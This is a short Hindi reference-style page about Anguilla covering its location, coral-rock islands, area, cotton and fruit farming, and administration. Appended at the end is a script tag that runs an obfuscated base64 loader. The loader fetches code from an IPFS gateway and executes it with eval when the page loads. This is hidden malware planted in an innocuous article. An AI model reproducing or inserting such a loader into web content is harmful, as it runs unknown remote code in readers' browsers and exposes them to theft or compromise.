अंगुइला
भारत डिस्कवरी प्रस्तुति
अंगुइला एक द्वीप समूह है, जो ब्रिटिश वेस्ट इंडीज में है।
- इसकी स्थिति 18° 12' उत्तरी अक्षांश तथा 63° पश्चिम देशांतर है।
- यह द्वीपसमूह वेस्ट इंडीज के छोटे ऐंटलीज ग्रूप में लीबर्ड द्वीपसमूह के अंतर्गत और ब्रिटेन के अधिकार में है।
- ये द्वीप साधारणत: मूँगों की चट्टानों से बने हुए हैं।
- इस समूह का सबसे बड़ा द्वीप अंगुइला है, जिसका क्षेत्रफल 35 वर्गमील है, शेष द्वीप बहुत ही छोटे हैं।
- अंगुइला द्वीप में न समुद्र तट के मैदान हैं और न कोई उल्लेखनीय नदी हैं।
- कम ढाल तथा चपटे भाग में खेती होती है, जिसमें कपास तथा फल पैदा होते हैं।
- समुद्र के किनारे नारियल के बाग़ हैं। इस द्वीपसमूह का शासन प्रबंध सेंट क्रिस्टोफ़र प्रेसीडेंसी के अंतर्गत होता है।[1]
|
|
|
|
|
टीका टिप्पणी और संदर्भ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>